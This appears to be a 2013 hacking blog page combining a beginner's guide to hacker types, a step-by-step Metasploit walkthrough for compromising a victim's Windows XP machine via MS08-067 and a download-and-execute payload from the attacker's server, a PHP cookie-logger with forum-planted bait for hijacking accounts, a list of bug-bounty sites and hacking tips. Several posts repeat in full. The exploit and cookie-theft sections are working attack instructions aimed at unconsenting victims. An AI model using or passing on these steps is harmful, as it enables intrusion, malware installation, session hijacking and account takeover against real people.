Wednesday, 31 July 2013
Friday, 26 July 2013
Monday, 15 July 2013
Begginer Guide to Hacking
There are three types of hackers:
White Hats:
--> The White Hat hacker has dedicated himself to fight malware and help others with their computer problems. He is a person you can trust, and he will most likely end up in a good paying job as a computer programmer or a security consultant. He will most certainly not end up in jail.
Grey Hats:
--> The Grey Hat hacker are in between white Hats and Black Hats. He will most likely commit pranks at people that he thinks is harmless, but it can also be illegal. He can at one time be helpful and help you with a computer problem, but at the same time infect you with his own virus. There is a chance that the grey hat will end up in prison.
Black Hats:
--> The Black hat hacker also known as a cracker is the one who deface websites, steal private information and such illegal activity. It is very time consuming to become a black hat. It can be very hard for them to get a job because of the illegal activity. If law enforcements gets you, you can expect jail time.
So where to start?
You should know the answer to these questions before you start your hacking career.
Which type of hacker do you want to be (white hat, grey hat or black hat)?
Which type of hacking do you want to work with (website hacking, system exploits, pentesting etc.)?
What is your end-goal?
You should meet these requirements to become a successful hacker.
You shall be patient.
You shall dedicate a lot of time to hacking. You will never stop learning, since hacking is a lifestyle.
You should have a computer (I expect you to have one since you are reading this).
You shall be interested in how the different computer systems works, and how to control them.
Now that you have an idea of what kind of hacker, you want to be we will look closer into the different topics you can work with as a hacker.
I. Website Hacking:
You properly already guessed it, but website hacking is about hacking websites
You use your skills to find exploits and vulnerabilities in websites and web applications. Almost all major hacking stories in the news are about websites and databases that have been hacked. Once you have enough experience in website security you will be amazed about how easy it is to find vulnerabilities in websites. However, it will take a lot of effort and time to reach that level of skills. You will need to know a large amount of server-side languages and website construction languages like PHP, HTML, JavaScript, SQL, ASP, ASP.NET and Perl. This was just some of the languages you should know about. I will recommend you to take JavaScript, SQL and PHP very serious since it is in those languages you will find the most vulnerabilities.
II. Pen testing and Forensics:
Pen testing and forensics can earn you big money. It is these guys the company’s call when they have been hacked. They are experts in operating systems, wireless connections and exploiting computers. This way will take A LOT of time and effort since there is so much you should know about. You shall know about how the different operating systems works, which exploit there is to them, how to exploit them, routers, encryption, malware etc. the list is almost endless.
III. Code exploiting:
Not many people know about this. This will require you to be a complete expert at programming. You shall be at least as good at these programming languages as your main language like English. This kind of hacking is taking a lot of time, and will require you to be patient. Do not get me wrong, every company that releases software like Symantec, Google, Microsoft, Adobe and Oracle have hackers with these skills employed to check their software for vulnerabilities. Sadly, they cannot find every security hole and therefore some very smart black hat hackers are able to find them, and exploit them before the companies get the vulnerability patched. You should know the most popular languages like C++, Java and C etc.
IV. Computer security:
The work of these people do looks a lot like the pentesters. These people are able to detect and analyze new viruses and malware. They are working for companies like Symantec, KasperSky and Avira etc. Some of them are also working on labs that tests AV’s and new viruses. They are experts in how viruses works and how they infect systems.
You should now have an idea on where to start and in which direction you want to go.
Welcome to the hacker’s world, a new world will open up for you and you will never regret that you chose to become a hacker...
White Hats:
--> The White Hat hacker has dedicated himself to fight malware and help others with their computer problems. He is a person you can trust, and he will most likely end up in a good paying job as a computer programmer or a security consultant. He will most certainly not end up in jail.
Grey Hats:
--> The Grey Hat hacker are in between white Hats and Black Hats. He will most likely commit pranks at people that he thinks is harmless, but it can also be illegal. He can at one time be helpful and help you with a computer problem, but at the same time infect you with his own virus. There is a chance that the grey hat will end up in prison.
Black Hats:
--> The Black hat hacker also known as a cracker is the one who deface websites, steal private information and such illegal activity. It is very time consuming to become a black hat. It can be very hard for them to get a job because of the illegal activity. If law enforcements gets you, you can expect jail time.
So where to start?
You should know the answer to these questions before you start your hacking career.
Which type of hacker do you want to be (white hat, grey hat or black hat)?
Which type of hacking do you want to work with (website hacking, system exploits, pentesting etc.)?
What is your end-goal?
You should meet these requirements to become a successful hacker.
You shall be patient.
You shall dedicate a lot of time to hacking. You will never stop learning, since hacking is a lifestyle.
You should have a computer (I expect you to have one since you are reading this).
You shall be interested in how the different computer systems works, and how to control them.
Now that you have an idea of what kind of hacker, you want to be we will look closer into the different topics you can work with as a hacker.
I. Website Hacking:
You properly already guessed it, but website hacking is about hacking websites
You use your skills to find exploits and vulnerabilities in websites and web applications. Almost all major hacking stories in the news are about websites and databases that have been hacked. Once you have enough experience in website security you will be amazed about how easy it is to find vulnerabilities in websites. However, it will take a lot of effort and time to reach that level of skills. You will need to know a large amount of server-side languages and website construction languages like PHP, HTML, JavaScript, SQL, ASP, ASP.NET and Perl. This was just some of the languages you should know about. I will recommend you to take JavaScript, SQL and PHP very serious since it is in those languages you will find the most vulnerabilities.
II. Pen testing and Forensics:
Pen testing and forensics can earn you big money. It is these guys the company’s call when they have been hacked. They are experts in operating systems, wireless connections and exploiting computers. This way will take A LOT of time and effort since there is so much you should know about. You shall know about how the different operating systems works, which exploit there is to them, how to exploit them, routers, encryption, malware etc. the list is almost endless.
III. Code exploiting:
Not many people know about this. This will require you to be a complete expert at programming. You shall be at least as good at these programming languages as your main language like English. This kind of hacking is taking a lot of time, and will require you to be patient. Do not get me wrong, every company that releases software like Symantec, Google, Microsoft, Adobe and Oracle have hackers with these skills employed to check their software for vulnerabilities. Sadly, they cannot find every security hole and therefore some very smart black hat hackers are able to find them, and exploit them before the companies get the vulnerability patched. You should know the most popular languages like C++, Java and C etc.
IV. Computer security:
The work of these people do looks a lot like the pentesters. These people are able to detect and analyze new viruses and malware. They are working for companies like Symantec, KasperSky and Avira etc. Some of them are also working on labs that tests AV’s and new viruses. They are experts in how viruses works and how they infect systems.
You should now have an idea on where to start and in which direction you want to go.
Welcome to the hacker’s world, a new world will open up for you and you will never regret that you chose to become a hacker...
How to infect or hack a computer with only IP address:
Requirements:
Nmap
Metasploit
First of all you need target IP of your victim.
Then open Metasploit Console & type db_create.
[Usage: This will create or connect you to a(your) database.]
Once you do that type Nmap.
[Usage: This will load Nmap in Metasploit Console]
Next you need to type db_nmap -sT -sV <target IP>
[This will scan OS, Ports, and Services running on the victim's computer.]
Wait for 5 minutes to complete the scan.
Once done, Note down the OS, Ports, and Services running on the slave's computer.
Now it's time to exploit the victim's machine.
Exploit depends on the OS, Ports, and Services running on the slave's computer.
So, you're lucky if you get OS WIN XP or 2000 because it's easy to exploit them.
No matter whether they are protected by a firewall or not.
Now:
Windows 2000 (all versions SP1, SP2, SP3, SP4)
Windows XP (all versions SP1, SP2, SP3)
Type show exploits
[Usage: This will show all the exploits in its database.]
Next you need to type use windows/smb/ms08_067_netapi
[Usage: This will select the exploit windows/smb/ms08_067_netapi]
Now Type show targets
[Usage: This will show all targets by exploit]
Now Type set target 0
[Usage: This will set target to 0 specified]
Then type show payloads
[Usage: This will bring up all the payloads]
Next type set payload windows/download_exec
[Usage: This will set the payload as windows/download_exec]
Then Type show options
[Usage: This will show all options in the exploit & payload]
In window you will see many options, in which you need to
Fill only two options RHOST & URL.
Type set RHOST <xxx.xxx.xxx.xxx >
[Usage: This will set RHOST (victim's ip) to xxx.xxx.xxx.xxx]
Next Type set URL http://www.xxxx.com/xxx.exe
[Usage: This will set the URL to your direct server link.]
Finally you need to type exploit
[Usage: This will launch the exploit & your slave will be infected.]
You can now control your slave with a RAT. (Remote administration tool.)
So, any versions of Win 2000-XP can be exploited easily.
You can use the command db_autopwn –p –t –e.
In most cases you get a shell!
Nmap
Metasploit
First of all you need target IP of your victim.
Then open Metasploit Console & type db_create.
[Usage: This will create or connect you to a(your) database.]
Once you do that type Nmap.
[Usage: This will load Nmap in Metasploit Console]
Next you need to type db_nmap -sT -sV <target IP>
[This will scan OS, Ports, and Services running on the victim's computer.]
Wait for 5 minutes to complete the scan.
Once done, Note down the OS, Ports, and Services running on the slave's computer.
Now it's time to exploit the victim's machine.
Exploit depends on the OS, Ports, and Services running on the slave's computer.
So, you're lucky if you get OS WIN XP or 2000 because it's easy to exploit them.
No matter whether they are protected by a firewall or not.
Now:
Windows 2000 (all versions SP1, SP2, SP3, SP4)
Windows XP (all versions SP1, SP2, SP3)
Type show exploits
[Usage: This will show all the exploits in its database.]
Next you need to type use windows/smb/ms08_067_netapi
[Usage: This will select the exploit windows/smb/ms08_067_netapi]
Now Type show targets
[Usage: This will show all targets by exploit]
Now Type set target 0
[Usage: This will set target to 0 specified]
Then type show payloads
[Usage: This will bring up all the payloads]
Next type set payload windows/download_exec
[Usage: This will set the payload as windows/download_exec]
Then Type show options
[Usage: This will show all options in the exploit & payload]
In window you will see many options, in which you need to
Fill only two options RHOST & URL.
Type set RHOST <xxx.xxx.xxx.xxx >
[Usage: This will set RHOST (victim's ip) to xxx.xxx.xxx.xxx]
Next Type set URL http://www.xxxx.com/xxx.exe
[Usage: This will set the URL to your direct server link.]
Finally you need to type exploit
[Usage: This will launch the exploit & your slave will be infected.]
You can now control your slave with a RAT. (Remote administration tool.)
So, any versions of Win 2000-XP can be exploited easily.
You can use the command db_autopwn –p –t –e.
In most cases you get a shell!
Create a CookieLogger and Hack any Account!
Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hackany account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.
What is a CookieLogger?
A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.
Today we are going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …
Step 1: Save the notepad file from the link below and Rename it as Fun.gif:
http://crocko.com/1702516956.html
Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:
<?php
$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>
Step 3: Create a new Notepad File and Save it as logfile.txt
Step 4: Upload this file to your server
cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif
If you don’t have any Website then you can use the following Website to get a Free Website which has php support :
http://0fees.net/
Step 5: Go to the victim forum and insert this code in the signature or a post:
http://crocko.com/1702516964.html
<a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a>
Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9
Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.
Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.
Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.
Disclaimer: We don’t take responsibility for what you do with this script, served for educational purpose only...
Crowd Sourcing Testing Communities
1. Utest.com - Need to pass sandbox test to get projects
2. Bugfinders.com
3. Pay4bugs.com
4. Bugcrowd.com
5. test.io - German based site
6. 99tests.com - Indian based site
7. Testlio.com - Only mobile app testing
8. Crowdsourcingtesting.com
9. Passbrians.com
10. We-test.com
20 Best Ways to become a Better Hacker
1) Learning scripting
languages such as Python, Perl and ruby can help you automate your tasks and
for sure improve your skills.
2) Understanding all possible user inputs is the fastest way to hack into the systems.
3) When u gain access to an account or whatever u hacking in to, best practice do not alter anything. just monitor the activity and continue fetching information u need.
4) Travel and see different countries, it will make you better.
5) Never hesitate for usage of Google and other resources available i.e. exploit-db, and be updated with versions and bugs in each versions, for example, if I talk about WordPress, then one who is looking to hack WordPress website or pentest, then he should be well aware of at least 3.0+ versions updating, so whichever version is being used on the website, he should know the vulnerabilities in that and their exploitation
6) RTFM, don't expect handouts. Educated questions, gets you educated answers
7) Move to Linux, learn Programming Languages C, Pearl, Lisp, Java and Html and write open source programs. Improve your functional English.
8)The most important factor for becoming a good hacker is, you must have your personal interest with computers. Additionally, you have to be definite in your work, such that you should take exactly interest in One thing at a single time. After covering the appropriate level of theory, the learner should try it practically as much as his satisfaction level. Watching Tutorials only for taking points, not really for following them from a to z exactly, because you have to be a good learner only if you have your personal intention for doing the things creatively.
9) One thing , Learn how old Hackers Started don't focus on new Programs like BACKTRACK , METASPLOIT , Learn Manual Hacking , Learn Coding and be patient ! Knowledge will come with time ! and practice all methods
10) Do not rely on tricks for hacking. As they will keep you a script kiddie, get deep understanding about stuffs. And also don't rush from one topic to another. All those combined will make you a better hacker. "Slow and Steady wins the race"
11) A support will always lift you up. Join groups, forums. Keep yourself updated with latest hacking news by reading blogs [Like this ;)], tweets etc.
12) Understand what programming language to use at what moment. You're time is valuable so don't waste it writing something that could have been done faster! (and understand the difference between a scripting language and a programming language, python for example is a programming language.
13) During hacking remain mentally intact and focus on your each step. During a step always remember your next steps and the way you have to link them. Dont always use old methods and tricks, try new one and use your own mind too. and remember one thing that there is no shortcut of Hacking, to became a hacker, you have to give your whole passion to hacking. "Hacking is an Art, and Hacker is an Artist".
14) This Attitude should be there within "SWEAT MORE IN PRACTISE, SO YOU BLEED LESS IN WAR".
15) Whatever you're going to test,start it with a basic stuff. If you dont know any,start learning.
16) Enumeration is the key to pwnage, the more you enumerate the more attack surface you get
17) Be patient! Learn different protocols and read the RFCs to understand how they work and if there are some "security by design" issues. After that you should try to understand the context you're in and therefore develop an exploit for this particular context.
18) Sleep less, read more. Learn & Think & Try & Fail & Never give up. Remember, "...imagination will take you everywhere".
19) Don't compete anyone, never think you are the best, just compete "the you in the past". There will always be a vulnerability waiting for being discovered, by someone who thinks different. Understanding human logic makes things easier. "Hackers realize, kiddies memorize"
20) Learn your own systems inside out, before moving on to other systems. The better you know your own, the more capable you will find yourself when it comes time to make your system work for you.
2) Understanding all possible user inputs is the fastest way to hack into the systems.
3) When u gain access to an account or whatever u hacking in to, best practice do not alter anything. just monitor the activity and continue fetching information u need.
4) Travel and see different countries, it will make you better.
5) Never hesitate for usage of Google and other resources available i.e. exploit-db, and be updated with versions and bugs in each versions, for example, if I talk about WordPress, then one who is looking to hack WordPress website or pentest, then he should be well aware of at least 3.0+ versions updating, so whichever version is being used on the website, he should know the vulnerabilities in that and their exploitation
6) RTFM, don't expect handouts. Educated questions, gets you educated answers
7) Move to Linux, learn Programming Languages C, Pearl, Lisp, Java and Html and write open source programs. Improve your functional English.
8)The most important factor for becoming a good hacker is, you must have your personal interest with computers. Additionally, you have to be definite in your work, such that you should take exactly interest in One thing at a single time. After covering the appropriate level of theory, the learner should try it practically as much as his satisfaction level. Watching Tutorials only for taking points, not really for following them from a to z exactly, because you have to be a good learner only if you have your personal intention for doing the things creatively.
9) One thing , Learn how old Hackers Started don't focus on new Programs like BACKTRACK , METASPLOIT , Learn Manual Hacking , Learn Coding and be patient ! Knowledge will come with time ! and practice all methods
10) Do not rely on tricks for hacking. As they will keep you a script kiddie, get deep understanding about stuffs. And also don't rush from one topic to another. All those combined will make you a better hacker. "Slow and Steady wins the race"
11) A support will always lift you up. Join groups, forums. Keep yourself updated with latest hacking news by reading blogs [Like this ;)], tweets etc.
12) Understand what programming language to use at what moment. You're time is valuable so don't waste it writing something that could have been done faster! (and understand the difference between a scripting language and a programming language, python for example is a programming language.
13) During hacking remain mentally intact and focus on your each step. During a step always remember your next steps and the way you have to link them. Dont always use old methods and tricks, try new one and use your own mind too. and remember one thing that there is no shortcut of Hacking, to became a hacker, you have to give your whole passion to hacking. "Hacking is an Art, and Hacker is an Artist".
14) This Attitude should be there within "SWEAT MORE IN PRACTISE, SO YOU BLEED LESS IN WAR".
15) Whatever you're going to test,start it with a basic stuff. If you dont know any,start learning.
16) Enumeration is the key to pwnage, the more you enumerate the more attack surface you get
17) Be patient! Learn different protocols and read the RFCs to understand how they work and if there are some "security by design" issues. After that you should try to understand the context you're in and therefore develop an exploit for this particular context.
18) Sleep less, read more. Learn & Think & Try & Fail & Never give up. Remember, "...imagination will take you everywhere".
19) Don't compete anyone, never think you are the best, just compete "the you in the past". There will always be a vulnerability waiting for being discovered, by someone who thinks different. Understanding human logic makes things easier. "Hackers realize, kiddies memorize"
20) Learn your own systems inside out, before moving on to other systems. The better you know your own, the more capable you will find yourself when it comes time to make your system work for you.
Subscribe to:
Posts (Atom)